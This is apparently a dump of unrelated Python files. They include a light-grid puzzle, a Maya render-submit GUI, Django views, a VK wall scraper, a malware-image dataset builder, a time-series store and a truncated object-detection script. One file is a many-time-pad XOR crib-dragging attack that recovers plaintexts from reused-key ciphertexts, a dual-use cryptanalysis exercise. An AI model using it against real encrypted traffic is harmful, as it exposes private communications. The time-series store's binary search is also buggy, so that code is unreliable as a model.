lightArray = [[0 for i in range(squareSize)] for j in range(squareSize)]
with open('Day06/LightDirections.txt') as file:
    for line in file:
        line = line.rstrip()
        if not line:
            break
        # Default to "turn on"; override when the line says otherwise.
        action = turnOn
        if toggleRE.match(line):
            action = toggle
        elif turnoffRE.match(line):
            action = turnOff
        # The four numbers are the two corner coordinates (inclusive).
        cords = cordsRE.findall(line)
        for x in range(int(cords[0]), int(cords[2]) + 1):
            for y in range(int(cords[1]), int(cords[3]) + 1):
                lightArray[x][y] = action(lightArray[x][y])

finalOnCount = 0
# The original left lightArray.txt open forever; 'with' closes it reliably.
with open("lightArray.txt", "w") as output:
    for x in range(squareSize):
        output.write(str(lightArray[x]))
        finalOnCount = finalOnCount + sum(lightArray[x])
print(finalOnCount)
|
import os, re, string, getpass
import rrt
from rrt.maya.shortcuts import scene_is_dirty, get_job_type, get_scene_name,\
get_frame_range
from pymel import versions
from pymel.core.system import workspace, sceneName
from pymel.core.general import Scene
from pymel.core import frameLayout, button, menuItem, columnLayout,\
optionMenu, intField, textField, text, formLayout, uiTemplate, window,\
confirmBox, checkBox, radioCollection, radioButton, setParent
from pymel.core.language import scriptJob #@UnresolvedImport
from rrt.localJobSpec import JobSpec
from random import randint
LOG = rrt.get_log('hpcSubmit')
class SubmitGui:
    """
    A Python singleton: every instantiation shares one hidden ``__impl``
    object, so the submit window and its state exist at most once per
    Maya session.
    """
    # storage for the shared implementation instance reference
    __instance = None
    def __init__(self):
        """ Create singleton instance """
        # Check whether we already have an instance
        if SubmitGui.__instance is None:
            # Create and remember instance
            SubmitGui.__instance = SubmitGui.__impl()
        # Store instance reference as the only member in the handle
        # (name-mangled key so the delegation below keeps working).
        self.__dict__['_SubmitGui__instance'] = SubmitGui.__instance
    @staticmethod
    def destroy():
        # Tear down the shared window (if any) and drop the instance so the
        # next SubmitGui() builds a fresh one.  The bare except swallows
        # errors from an already-deleted Maya window.
        try: SubmitGui.__instance.destroy()
        except: pass
        SubmitGui.__instance = None
    def __getattr__(self, attr):
        """ Delegate attribute reads to the shared implementation. """
        return getattr(self.__instance, attr)
    def __setattr__(self, attr, value):
        """ Delegate attribute writes to the shared implementation. """
        return setattr(self.__instance, attr, value)
    class __impl:
        """
        Manages the window, its data, the ini generation, and submission
        routines.
        """
        window_title = "Launch Local Render"
        _win = None        # pymel window handle, created by create()
        _controls = {}     # control name -> pymel UI control
        # a regex used to strip out bad chars in filenames
        _filter_text_pattern = re.compile('[%s]' % re.escape(string.punctuation))
        _allowed_punctuation = r'/\._-'
        # every punctuation char EXCEPT the allowed ones; used to validate paths
        _illegal_path = re.sub('[%s]' % re.escape(_allowed_punctuation),'',string.punctuation)
        def filter_text(self, s):
            """Strip all punctuation from *s* and trim surrounding whitespace."""
            return self._filter_text_pattern.sub('', s).strip()
        # references to key controls
        @property
        def job_title(self):
            """
            Read-only filtered version of the job title.
            """
            return self.filter_text(self._controls['title'].getText())
        # @property
        # deprecated
        # def job_threads(self):
        #     """
        #     Number of threads to render with, as specified by the control in the
        #     submit window.
        #     """
        #     return int(self._controls['threads'].getValue())
        @property
        def job_start(self):
            # min/max make the frame range order-insensitive if the user
            # swaps the start/end fields.
            return min((int(self._controls['start'].getValue()),int(self._controls['end'].getValue())))
        @property
        def job_end(self):
            return max((int(self._controls['start'].getValue()),int(self._controls['end'].getValue())))
        @property
        def job_step(self):
            """Frame increment between rendered frames."""
            return int(self._controls['step'].getValue())
        @property
        def job_data(self):
            """Collect every submission parameter into the dict JobSpec expects."""
            moddedType = str(get_job_type())
            # '_local' suffix marks a plain local batch render (no cluster emulation)
            if os.environ['EMULATE'] == '0':
                moddedType +='_local'
            return {
                'renderer': moddedType,
                'title': self.job_title,
                'project': os.path.normpath(workspace.getPath()),
                'output': os.path.join('D:\\hpc\\', getpass.getuser(), '{job_id}', 'output'), # job_id is injected by hpc-spool when the submission happens
                'scene': os.path.normpath(sceneName()),
                'start': self.job_start,
                'end': self.job_end,
                'threads': 4, #self.job_threads,
                'step': self.job_step,
                'ext' : None
                }
        def _is_valid(self):
            """
            Validate the pending submission.  Returns True when it may be
            submitted; otherwise logs the reason and returns False.
            """
            LOG.info("Validating submission:")
            # Dry-run the spec constructor to surface bad field values early.
            try:
                JobSpec(**self.job_data)
            except Exception, err:
                LOG.warning('Could not build job file...')
                LOG.error(err)
                return False
            if not self.job_title:
                LOG.error("Job title must not be blank.")
                return False
            if ' ' in sceneName():
                LOG.error("Scene name or project path contains spaces. Rename/Save As... before submitting.")
                return False
            if re.search('[%s]' % re.escape(self._illegal_path), os.path.splitdrive(sceneName())[1]):
                LOG.error("Scene name or project path contains illegal characters: e.g. %s -- Rename/Save As... before submitting." % self._illegal_path)
                return False
            # Hard cap to keep debug submissions small.
            if len(range(self.job_start, self.job_end, self.job_step)) > 25:
                LOG.error("Number of frames exceeded allowed total frame count for debugging purposes.")
                return False
            if scene_is_dirty():
                LOG.warning("File has unsaved changes. Save before submitting.")
                if not confirmBox('Unsaved changes?', 'Scene may have unsaved changes.', 'Submit Anyway', 'Cancel'):
                    return False
            return True
        def submit_job(self, *args, **kwargs):
            """Submit-button callback: validate, then hand the job to hpc-spool."""
            # Persist the emulation choice for job_data via the environment.
            os.environ['EMULATE'] = '1' if self._controls['emulate'].getValue() else '0'
            if self._is_valid():
                spec = JobSpec(**self.job_data)
                LOG.debug(spec.ini_data)
                try:
                    spec.submit_job(pause= 1 if self._controls['pause'].getValue() else 0)
                except Exception, e:
                    LOG.error(e)
        def destroy(self):
            """Delete the Maya window if it exists (errors are only logged)."""
            if self._win:
                try: self._win.delete()
                except Exception, e:
                    LOG.debug(e)
        def new_window(self):
            """Recreate the submit window from scratch."""
            self.destroy()
            self.create()
        @property
        def window(self): return self._win
        def create(self):
            """
            Generates a new maya window object and binds it to the singleton
            instance.
            """
            SCENE = Scene()
            self._win = window(title=self.window_title,
                               resizeToFitChildren=True)
            with self._win:
                template = uiTemplate('LocalSubmitTemplate', force=True )
                template.define(frameLayout, bs='etchedIn', mw=6, mh=6,
                                labelVisible=False)
                template.define(columnLayout, adj=True, rs=4)
                template.define(formLayout, nd=100)
                # padding adjustment for pre-qt maya versions
                if versions.current() <= versions.v2010:
                    template.define(text, align='right', h=22)
                else:
                    template.define(text, align='right', h=20)
                with template:
                    with formLayout() as mainForm:
                        with frameLayout() as setFrame:
                            with formLayout() as setForm:
                                # Left column: static labels; right column: inputs.
                                with columnLayout() as setCol1:
                                    text(label="Title:")
                                    text(label="Start Frame:")
                                    text(label="End Frame:")
                                    text(label="Frame Step:")
                                    text(label="Emulation:", annotation='If selected, the local render will behave in the same environtment as the Cluster, otherwise it will act as a normal local batch render')
                                with columnLayout() as setCol2:
                                    self._controls['title'] = textField(text=get_scene_name())
                                    self._controls['start'] = intField(value=get_frame_range()[0])
                                    self._controls['end'] = intField(value=get_frame_range()[1])
                                    self._controls['step'] = intField(value=int(SCENE.defaultRenderGlobals.byFrameStep.get()))
                                    self._controls['emulate'] = checkBox(label="Cluster Emulation", annotation='If selected, the local render will behave in the same environtment as the Cluster, otherwise it will act as a normal local batch render')
                                    self._controls['pause'] = checkBox(label="Pause before exit")
                                    # self._controls['debug'] = checkBox(label="Show debug messages")
                                setForm.attachForm(setCol1, 'left', 4)
                                setForm.attachControl(setCol1, 'right', 2, setCol2)
                                setForm.attachForm(setCol2, 'right', 4)
                                setForm.attachPosition(setCol2, 'left', 40, 20)
                        with frameLayout() as subFrame:
                            submit_btn = button(label="Submit", width=200, height=40, align='center')
                            submit_btn.setCommand(self.submit_job)
                        mainForm.attachForm(setFrame, 'top', 4)
                        mainForm.attachForm(setFrame, 'left', 4)
                        mainForm.attachForm(setFrame, 'right', 4)
                        mainForm.attachControl(setFrame, 'bottom', 4, subFrame)
                        mainForm.attachForm(subFrame, 'bottom', 4)
                        mainForm.attachForm(subFrame, 'left', 4)
                        mainForm.attachForm(subFrame, 'right', 4)
            """
            We force the closure of an open submit window on scene open
            to ensure the new scene's settings are reflected.
            """
            scriptJob(parent=self._win, runOnce=True,
                      event=('SceneOpened', SubmitGui.destroy))
|
from loaders import readFile
from loaders import convertTo
from loaders import toAscii
from loaders import xor
from loaders import asciid
from loaders import is_ascii
from loaders import number_is_ascii
from loaders import strxor
from loaders import strxorShifted
from loaders import arrayOfNumberToArrayOfASCII
from loaders import arrayOfAsciiToArrayOfNumber
from loaders import readConcordance
from loaders import probableSentence
import pdb
import string
import collections
import sets
# Load the ciphertexts and a word-frequency concordance used for crib
# guessing in the interactive loop at the bottom.
ciphertextsList = readFile("ciphertexts/all.txt")
dictlist = readConcordance("concordance/raj.txt", 1000)
listsOfBytes = convertTo(ciphertextsList)
# superarr: one list of integer byte values per ciphertext line.
superarr = []
for byteList in listsOfBytes:
    arr = []
    for byte in byteList:
        elem = toAscii(byte)
        arr.append(elem)
    superarr.append(arr)
# Character table over letters + common punctuation.
# NOTE(review): built but never referenced below — confirm this is dead code.
dicted = dict.fromkeys(string.ascii_letters, 0)
special = dict.fromkeys(".-,'!? ", 0)
dicted.update(special)
# ---------- finding spaces
# Many-time-pad attack: transpose the ciphertexts into columns and, per
# column, find the byte that most often XORs with the others to a value
# >= 65 — that byte most plausibly encrypts a space.
list_of_list = list()
max_line_length = 0
for line_of_cipher in superarr:
    if (len(line_of_cipher) > max_line_length):
        max_line_length = len(line_of_cipher)
    line_aux = list()
    for c in line_of_cipher:
        line_aux.append(c)
    list_of_list.append(line_aux)
zero_to_max_line_length = range(0, max_line_length)
list_of_columns = list()
for step in zero_to_max_line_length:
    list_of_columns.insert(step, list())
# Transpose: list_of_columns[j] collects the j-th byte of every line.
for line in list_of_list:
    for index, item in enumerate(line, 0):
        aux_for_columns = list_of_columns.pop(index)
        aux_for_columns.append(item)
        list_of_columns.insert(index, aux_for_columns)
spaces = list()
pad = list()
for column in list_of_columns:
    mydict = {}  # candidate byte -> number of large-XOR pairings
    for i in column:
        for j in column:
            result = i ^ j
            # space ^ letter flips bit 0x20 and lands in the letter range,
            # so a large XOR suggests one of the two bytes is a space.
            if (result >= 65):
                if i not in mydict:
                    mydict[i] = 1
                else:
                    mydict[i] = mydict.get(i) + 1
                if j not in mydict:
                    mydict[j] = 1
                else:
                    mydict[j] = mydict.get(j) + 1
    maximum = max(mydict, key=mydict.get)
    spaces.append(maximum)
# Recover each key byte: presumed space ciphertext byte XOR 0x20.
for space in spaces:
    pad.append(space ^ 32)
# Decrypt every line with the recovered pad and print the drafts.
cleartexts = []
for index_row, row in enumerate(superarr, 0):
    columns = []
    for index_column, column in enumerate(row, 0):
        columns.append(superarr[index_row][index_column] ^ pad[index_column])
    cleartexts.append(columns)
for clear in cleartexts:
    print ''.join(arrayOfNumberToArrayOfASCII(clear))
# ---------- sanity check against PAD
# XOR every line against the last (target) ciphertext; typing a crib guess X
# at the prompt shows what the other plaintexts would read if X were right.
size_of_seeked_cipher = len(superarr[len(superarr)-1])
d = []
for index1, ciphertext1 in enumerate(superarr):
    xored = strxor(ciphertext1, superarr[len(superarr)-1])
    d.append(xored)
X = "A"
minProb = 0.5
count = 0
# for X in dictlist[::-1]:
while X != "":
    X = raw_input(">")
    print("-----------------------", X)
    for it, probString in enumerate(d):
        if len(X) <= size_of_seeked_cipher:
            singleHit = []
            for i, x in enumerate(X):
                if len(X) <= len(probString):
                    singleHit.append(probString[i] ^ ord(x))
            sent = ''.join(arrayOfNumberToArrayOfASCII(singleHit)).lower()
            # if probableSentence(sent, minProb, [x.lower() for x in dictlist]):
            print(sent, it, X, len(probString), len(sent))
            singleHit = []
|
from django.urls import reverse_lazy
from django.views.generic import TemplateView, ListView, UpdateView, CreateView, DeleteView
from helloworld.models import Curso
from helloworld.models import Usuario
from website.forms import InsereCursoForm
from website.forms import InsereUsuarioForm
# PÁGINA PRINCIPAL
# ----------------------------------------------
class IndexTemplateView(TemplateView):
    """Renders the site landing page."""
    template_name = "website/index.html"
# LISTA DE CURSOS
# ----------------------------------------------
class CursoListView(ListView):
    """Lists every Curso; available in the template as 'cursos'."""
    template_name = "website/lista.html"
    model = Curso
    context_object_name = "cursos"
# CADASTRAMENTO DE CURSOS
# ----------------------------------------------
class CursoCreateView(CreateView):
    """Creates a Curso via InsereCursoForm, then redirects to the course list."""
    template_name = "website/cria.html"
    model = Curso
    form_class = InsereCursoForm
    success_url = reverse_lazy("website:lista_cursos")
# ATUALIZAÇÃO DE CURSOS
# ----------------------------------------------
class CursoUpdateView(UpdateView):
    """Edits all fields of an existing Curso, then redirects to the course list."""
    template_name = "website/atualiza.html"
    model = Curso
    fields = '__all__'
    context_object_name = 'curso'
    success_url = reverse_lazy("website:lista_cursos")
# EXCLUSÃO DE CURSOS
# ----------------------------------------------
class CursoDeleteView(DeleteView):
    """Confirms and deletes a Curso, then redirects to the course list."""
    template_name = "website/exclui.html"
    model = Curso
    context_object_name = 'curso'
    success_url = reverse_lazy("website:lista_cursos")
# LISTA DE USUARIOS
# ----------------------------------------------
class UsuarioListView(ListView):
    """Lists every Usuario; available in the template as 'usuarios'."""
    template_name = "website/lista_usuarios.html"
    model = Usuario
    context_object_name = "usuarios"
# CADASTRAMENTO DE USUARIOS
# ----------------------------------------------
class UsuarioCreateView(CreateView):
    """Creates a Usuario via InsereUsuarioForm, then redirects to the user list."""
    template_name = "website/cria_usuario.html"
    model = Usuario
    form_class = InsereUsuarioForm
    success_url = reverse_lazy("website:lista_usuarios")
# ATUALIZAÇÃO DE USUARIOS
# ----------------------------------------------
class UsuarioUpdateView(UpdateView):
    """Edits all fields of an existing Usuario, then redirects to the user list."""
    template_name = "website/atualiza_usuario.html"
    model = Usuario
    fields = '__all__'
    context_object_name = 'usuario'
    success_url = reverse_lazy("website:lista_usuarios")
# EXCLUSÃO DE USUARIOS
# ----------------------------------------------
class UsuarioDeleteView(DeleteView):
    """Confirms and deletes a Usuario, then redirects to the user list."""
    template_name = "website/exclui_usuario.html"
    model = Usuario
    context_object_name = 'usuario'
    success_url = reverse_lazy("website:lista_usuarios")
|
import datetime as dt1
from datetime import datetime as dt2
import json
import os
import os.path
from vk.exceptions import VkAPIError
api = None         # vk.API instance; initialised in main() before any request
MAX_REQUEST = 100  # safety cap on wall.get pages (100 posts each) per community
# Unix 'date' field of a post -> local datetime of publication.
item_dt = lambda i: dt2.fromtimestamp(i['date'])
def get_till_date(domain, bound_dt, use_owner_id=False, owner_id=0):
    """Fetch wall posts of a community, newest first, until they become
    older than bound_dt.

    Fix: the original declared ``global posts``, leaking the working list
    into module state on every call.  The list is now a plain local — the
    function already returned it, so callers are unaffected.

    :param domain: community short name (used unless use_owner_id)
    :param bound_dt: datetime; posts older than this are discarded
    :param use_owner_id: query by numeric owner_id instead of domain
    :param owner_id: numeric community id (negative for groups)
    :return: list of post dicts as returned by VK wall.get
    """
    posts = list()
    for i in range(MAX_REQUEST):
        # Page through the wall 100 posts at a time (VK's per-call maximum).
        if not use_owner_id:
            d = api.wall.get(domain=domain, count=100, offset=100*i)
        else:
            d = api.wall.get(owner_id=owner_id, count=100, offset=100*i)
        if not d['items']:
            break
        dt = item_dt(d['items'][-1])
        if dt >= bound_dt:
            # Whole page is recent enough — keep it all.
            posts.extend(d['items'])
        else:
            # Page straddles the boundary: keep the recent part and stop.
            posts.extend(filter(lambda p: item_dt(p) >= bound_dt, d['items']))
            break
    else:
        print('Warning! {0} data was not fully dumped. Adjust MAX_REQUEST'.format(domain))
    return posts
def cluster_weeks(posts, start_dt, end_dt=None):
    """Group posts into ISO calendar weeks between start_dt and end_dt.

    Fix: the original signature was ``end_dt=dt2.now()`` — a default that is
    evaluated ONCE at import time, so a long-running process would silently
    cluster against a stale "now".  The default is now resolved per call;
    callers that pass end_dt explicitly are unaffected.

    :param posts: post dicts carrying a unix 'date' field
    :param start_dt: datetime of the earliest post to expect
    :param end_dt: datetime of the latest week to pre-create (default: now)
    :return: list of {'date', 'yw', 'items'} dicts sorted by (year, week)
    """
    if end_dt is None:
        end_dt = dt2.now()
    weeks = dict()
    # Rewind start_dt to the Monday of its ISO week so buckets align.
    zero_dt = start_dt - dt1.timedelta(days=start_dt.isocalendar()[2]-1)
    # Pre-create one (possibly empty) bucket per week in the range.
    for i in range(0, (end_dt-zero_dt).days+1, 7):
        dt = zero_dt + dt1.timedelta(days=i)
        yw = dt.isocalendar()[:2]
        weeks[yw] = {'date': dt.strftime('%Y-%m-%d'),
                     'yw': yw,
                     'items': []}
    for post in posts:
        # Same conversion as the module-level item_dt helper.
        dt = dt2.fromtimestamp(post['date'])
        yw = dt.isocalendar()[:2]
        try:
            weeks[yw]['items'].append(post)
        except KeyError:
            # Post falls outside the pre-created range; report and drop it.
            print('Post date out of range', dt)
            print(post['text'])
    return [weeks[w] for w in sorted(weeks.keys())]
def save_posts_by_weeks(weeks, suffix='', outdir='.', dump_reposts=True):
    """Write one plain-text file per week ('<date>_<suffix>.txt' in outdir).

    Each post's text is followed by the texts of its reposts (when
    dump_reposts is set and the post carries a 'copy_history') and a
    blank separator line.
    """
    for week in weeks:
        filename = '{0}_{1}.txt'.format(week['date'], suffix)
        path = os.path.join(outdir, filename)
        with open(path, 'w') as out:
            for post in week['items']:
                out.write(post['text'] + '\n')
                if dump_reposts and 'copy_history' in post:
                    for repost in post['copy_history']:
                        out.write(repost['text'] + '\n')
                out.write('\n')
def dump(domain, date, dirname='', dump_json=True, dump_reposts=True, use_owner_id=False, owner_id=0):
    """Scrape one community back to `date` ('%Y-%m-%d'), then write the raw
    JSON (posts + week clusters) under ./json_<dirname> and per-week text
    dumps under ./dump_<dirname>."""
    dt = dt2.strptime(date, '%Y-%m-%d')
    posts = get_till_date(domain, dt, use_owner_id, owner_id)
    weeks = cluster_weeks(posts, dt)
    json_path = './json_{0}'.format(dirname)
    dump_path = './dump_{0}'.format(dirname)
    if dump_json:
        if not os.path.exists(json_path): os.mkdir(json_path)
        with open(json_path+'/{0}_posts.json'.format(domain), 'w', encoding='utf-8') as f:
            f.write(json.dumps(posts, ensure_ascii=False, sort_keys=True, indent=2))
        with open(json_path+'/{0}_weeks.json'.format(domain), 'w', encoding='utf-8') as f:
            f.write(json.dumps(weeks, ensure_ascii=False, sort_keys=True, indent=2))
    if not os.path.exists(dump_path): os.mkdir(dump_path)
    save_posts_by_weeks(weeks, domain, dump_path, dump_reposts)
def dumplist(domainlist, date, dirname='', ignore=None, dumpjson=True):
    """Dump every community in domainlist (skipping `ignore`) and return the
    list of communities dumped successfully.

    Fix: `ignore` had a mutable default (``list()``).  It is now ``None``
    with a per-call fallback — the standard guard against defaults shared
    across calls; callers that pass a list explicitly are unaffected.
    """
    if ignore is None:
        ignore = []
    scrapped = list()
    for domain in domainlist:
        if domain in ignore: continue
        try:
            try:
                dump(domain, date, dirname, dumpjson)
            except VkAPIError:
                # 'club123...' / 'public123...' URLs need a numeric owner_id;
                # lstrip removes the alphabetic prefix (digits are not in the
                # stripped character set, so the id itself is safe).
                owner_id = -int(domain.lstrip('clubpublic'))
                dump(domain, date, dirname, dumpjson, use_owner_id=True, owner_id = owner_id)
        except Exception as e:
            print(domain, 'failed :(', type(e), e)
        else:
            scrapped.append(domain)
            print(domain, 'dumped!')
    return scrapped
def getfn(fp):
    """Return the basename of path *fp* with its last extension removed
    (empty string when the name contains no dot).

    Rewritten from a lambda assignment (PEP 8 E731) into a named, documented
    function; behaviour is unchanged.
    """
    basename = fp.split('/')[-1]
    return '.'.join(basename.split('.')[:-1])
def dump_from_links_file(links_filepath, date, ignore=None, dumpjson=True):
    """Read community links from links_filepath (one URL per line, comment
    and blank lines skipped) and dump each of them back to `date`.

    Fixes: the file handle was never closed (now a with-block); `ignore`
    had a mutable default; and `dumpjson` was accepted but silently never
    forwarded to dumplist — it is now passed through.
    """
    if ignore is None:
        ignore = []
    with open(links_filepath) as links_file:
        # Keep only lines that are non-blank and start with a letter,
        # then take the last path component as the community domain.
        domains = [l.split('/')[-1].strip('\n')
                   for l in links_file
                   if l.strip(' \n') and l[0].isalpha()]
    return dumplist(domains, date, getfn(links_filepath), ignore, dumpjson)
def main(access_token, links_filepath, date):
    """Entry point: dump every community linked in links_filepath back to
    `date`, remembering already-scraped communities in <name>_scrapped.txt
    so reruns skip them."""
    global api
    import vk
    lname = getfn(links_filepath)
    sname = '{0}_scrapped.txt'.format(lname)
    if os.path.exists(sname):
        with open(sname) as scf:
            scrapped = list(map(lambda l: l.rstrip('\n '), scf.readlines()))
    else:
        scrapped = list()
    session = vk.Session(access_token=access_token)
    # Module-level `api` is shared with get_till_date().
    api = vk.API(session, v='5.35', lang='ru', timeout=10)
    new_scrapped = dump_from_links_file(links_filepath, date, scrapped)
    # Append the fresh successes so the next run can skip them too.
    with open(sname, 'a+') as scf:
        for s in new_scrapped: scf.write(s+'\n')
if __name__ == '__main__':
    # Interactive entry point: credentials and range are read from stdin.
    token = input('Input your token: ')
    links = input('Enter the name of links file: ')
    data = input('Enter the date you want to scrap till: ')  # holds the date string
    main(token, links, data)
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Fri Nov 29 03:33:51 2019
@author: admin
"""
import numpy as np
import os
import cv2
import pandas as pd
#reshape size of malware images uniformly
size = 32

# One flattened size*size grayscale image per row; labels[i] names the
# malware family of feature[i].
feature = np.zeros((9111, 1024))  # (8966,1024)
print(feature)
labels = ['NONE']*(9111)
i = -1       # index of the last filled row of `feature`
count = 0    # number of files that could not be read

# Static path is given. Update as per your system.
BASE_IMAGE_PATH = '/Volumes/ESD-USB/Project/images/'

def _load_family(directory1, family):
    """Read every image under BASE_IMAGE_PATH/directory1, resize it to
    size*size, and append its flattened pixels / family label to the
    module-level `feature` matrix and `labels` list.

    Fixes over the original four copy-pasted loops:
    - the try/except wrapped the WHOLE directory loop, so the first
      unreadable file silently skipped the rest of that family; the guard
      is now per file, matching the per-file error message and counter;
    - the duplication itself (one loop body instead of four).
    """
    global i, count
    your_path = BASE_IMAGE_PATH + directory1 + '/'
    for file in os.listdir(your_path):
        try:
            img = cv2.imread(os.path.join(your_path, file), 0)
            compressed = cv2.resize(img, (size, size))
            i = i + 1
            feature[i] = compressed.flatten()
            labels[i] = family
        except:  # NOTE(review): kept broad to match original behaviour (cv2 failure modes vary)
            count = count + 1
            print("file not read" + file)

_load_family('securityshield_images', 'securityshield')
_load_family('winwebsec_images', 'winwebsec')
_load_family('zbot_images', 'zbot')
_load_family('zeroaccess_images', 'zeroaccess')

feature = feature[:9110]  #[:9110]
labels = labels[:9110]    #[:9110]

# making csv of flattened array and label
# (comprehension avoids clobbering the module-level row counter `i`,
# which the original column-name loop reused)
a = ['features' + str(col) for col in range(1024)]
feature = pd.DataFrame(feature, columns=a)
feature.to_csv('/Users/admin/Desktop/feature.csv', sep=',')
labels = pd.DataFrame({'label': labels})
labels.to_csv('/Users/admin/Desktop/labels.csv', sep=',')
#data = pd.DataFrame({'feature':feature,'label':labesls})
#data.to_csv('malware_data_final.csv',sep=',')
|
# Read N (number of students) and X (number of subjects), then X lines of
# marks — one line per subject with N marks each.  Print every student's
# average across subjects to one decimal place.
N, X = map(int, input().split())
subjects = [list(map(float, input().split())) for _ in range(X)]
# Transposing turns per-subject rows into per-student tuples.
for student_marks in zip(*subjects):
    print('{0:.1f}'.format(float(sum(student_marks) / X)))
class Solution:
    def twoSum(self, nums: List[int], target: int) -> List[int]:
        """Return the indices [i, j] (i < j) of the two entries of `nums`
        that sum to `target`, or None when no such pair exists.

        Improvement: the original built a full value->index dict and then
        scanned the list a second time (with the `in d.keys()` anti-idiom);
        this single pass checks each element's complement against the
        values seen so far, returning the same index pair.
        """
        seen = {}  # value -> index of an earlier occurrence
        for i, value in enumerate(nums):
            complement = target - value
            if complement in seen:
                return [seen[complement], i]
            seen[value] = i
|
class storage(object):
    """Per-key time series: maps key -> list of [timestamp, value] pairs in
    insertion order.  get() answers point-in-time queries via binary search,
    assuming timestamps were inserted in increasing order per key."""
    def __init__(self):
        super(storage, self).__init__()
        self.dic = dict()  # key -> [[t, v], ...]
    def put(self, k,v,t):
        # Append only; keeping timestamps ordered is the caller's job.
        if k not in self.dic:
            self.dic[k] = [[t,v]]
        else:
            self.dic[k].append([t,v])
    def getall(self, k):
        # Full [t, v] history for k, or None for an unknown key.
        if k not in self.dic:
            return
        else:
            return self.dic[k]
    def get(self, k,t):
        # Value the binary search lands on for timestamp t, or None for an
        # unknown key.
        # NOTE(review): on an exact timestamp match binarysearch returns
        # mid+1, i.e. the value recorded AFTER t — confirm whether the
        # intent was 'value at or before t'.
        if k not in self.dic:
            return
        else:
            candidate = self.dic[k]
            index = self.binarysearch(candidate, t)
            return candidate[index][1]
    def binarysearch(self,nums, target):
        # NOTE(review): `/` is Python 2 integer division here (the module
        # uses print statements); under Python 3 `mid` becomes a float index.
        l,r = 0 ,len(nums)
        while l + 1 < r:
            mid = l + (r-l)/2
            if nums[mid][0] == target:
                return mid+1
            elif nums[mid][0] < target:
                l = mid
            else:
                r = mid
        # NOTE(review): r == len(nums) when target exceeds every timestamp,
        # so nums[r] below raises IndexError — needs a bounds check.
        if nums[l][0] < target and nums[r][0] < target:
            return r +1
        else:
            return r
# Smoke test: one key, four inserts, then a history query and a
# point-in-time lookup.
m = storage()
m.put('a',1,1)
m.put('a',1,2)
m.put('a',2,3)
m.put('a',4,5)
print m.getall('a')
print m.get('a',2)
|
import tensorflow as tf
import numpy as np
import cv2
import datetime
import argparse
# You will need to download:
# 1) a pre-trained tensorflow model which performs object detection on MSCOCO objects
# 2) the associated 90-class text labels from the MSCOCO object dataset
#
# For instance, to download the following model:
#
# ssdlite_mobilenet_v2_coco_2018_05_09
#
# use wget to fetch the model:
#
# $ wget http://download.tensorflow.org/models/object_detection/ssdlite_mobilenet_v2_coco_2018_05_09.tar.gz
# $ tar -xzvf ssdlite_mobilenet_v2_coco_2018_05_09.tar.gz
#
# and the label file:
#
# $ wget https://raw.githubusercontent.com/tensorflow/models/master/research/object_detection/data/mscoco_label_map.pbtxt
#
#
# Note that other models with different speed/accuracy tradeoffs are available!
# If interested, consult the Detection Model Zoo for other pre-trained models:
# https://github.com/tensorflow/models/blob/master/research/object_detection/g3doc/detection_model_zoo.md
# Frozen TF1 inference graph and its MSCOCO label map (download notes above).
MODEL = 'ssdlite_mobilenet_v2_coco_2018_05_09/frozen_inference_graph.pb'
LABELS = 'mscoco_label_map.pbtxt'
REPORT_TIMING = False  # set True to print per-frame inference latency
def read_labels(labelfile):
    """Parse an MSCOCO label_map.pbtxt into {class_id: display_name}.

    Relies on the file's fixed 5-line record layout: within each record the
    third line carries the id and the fourth the quoted display_name.  The
    character-set based strip/lstrip calls only work because ids are numeric
    and names are quoted.
    """
    with open(labelfile, 'r') as fid:
        lines = fid.readlines()
    id_lines = lines[2::5]
    name_lines = lines[3::5]
    parsed_ids = [int(raw.strip("id: ").rstrip()) for raw in id_lines]
    parsed_names = [raw.lstrip("display_name: ")[1:].rstrip("\"\n")
                    for raw in name_lines]
    return dict(zip(parsed_ids, parsed_names))
def run_inference_for_single_image(image, sess, tensor_dict, image_tensor):
    """Run one detection pass over `image` and return per-image results
    ('num_detections', 'detection_classes', 'detection_boxes',
    'detection_scores') with the batch dimension stripped.

    :param image: single frame array; a batch axis is added below
    :param sess: open tf.Session on the detection graph
    :param tensor_dict: output-name -> tensor mapping to fetch
    :param image_tensor: the graph's 'image_tensor:0' input placeholder
    """
    if REPORT_TIMING:
        tstart = datetime.datetime.now()
    output_dict = sess.run(tensor_dict,
                           feed_dict={image_tensor: np.expand_dims(image, 0)})
    if REPORT_TIMING:
        tdone = datetime.datetime.now()
        print("Inference time: {}".format(tdone - tstart))
    # all outputs are float32 numpy arrays, so convert types as appropriate
    output_dict['num_detections'] = int(output_dict['num_detections'][0])
    output_dict['detection_classes'] = output_dict[
        'detection_classes'][0].astype(np.uint8)
    output_dict['detection_boxes'] = output_dict['detection_boxes'][0]
    output_dict['detection_scores'] = output_dict['detection_scores'][0]
    return output_dict
def cv2_visualize_results(image, output_dict, labels, detect_thresh=0.5):
    """Draw a green box and class label on `image` (modified in place) for
    every detection scoring above detect_thresh.

    :param image: HxWx3 frame from OpenCV
    :param output_dict: per-image results from run_inference_for_single_image
    :param labels: class_id -> display name map from read_labels
    :param detect_thresh: minimum score for a detection to be drawn
    """
    imheight, imwidth, _ = image.shape
    for ix,score in enumerate(output_dict['detection_scores']):
        if score > detect_thresh:
            # Boxes come back normalised [ymin, xmin, ymax, xmax]; scale to pixels.
            [ymin,xmin,ymax,xmax] = output_dict['detection_boxes'][ix]
            classid = output_dict['detection_classes'][ix]
            classname = labels[classid]
            x,y = (int(xmin * imwidth), int(ymin * imheight))
            X = int(xmax * imwidth)
            Y = int(ymax * imheight)
            # bounding box viz
            cv2.rectangle(image, (x,y), (X,Y), (0,255,0), 2)
            # class label viz
            label_background_color = (0, 255, 0)
            label_text = "{}".format(classname)
            label_text_color = (0,0,0)
            label_size = cv2.getTextSize(label_text, cv2.FONT_HERSHEY_SIMPLEX, 1, 1)[0]
            label_left = x
            label_top = y - label_size[1]
            # keep the label inside the frame when the box touches the top edge
            if (label_top < 1):
                label_top = 1
            label_right = label_left + label_size[0]
            label_bottom = label_top + label_size[1]
            cv2.rectangle(image, (label_left - 1, label_top - 1), (label_right + 1, label_bottom + 1),
                          label_background_color, -1)
            # label text above the box
            cv2.putText(image, label_text, (label_left, label_bottom), cv2.FONT_HERSHEY_SIMPLEX, 1, label_text_color, 2,cv2.LINE_AA)
if __name__ == "__main__":
    parser = argparse.ArgumentParser()
    parser.add_argument("-v", "--video", help="/dev/videoN where N is an integer 0,1,2...", type=int, default=0)
    args = parser.parse_args()
    # read the model graph and labels from disk:
    detection_graph = tf.Graph()
    with detection_graph.as_default():
        od_graph_def = tf.GraphDef()
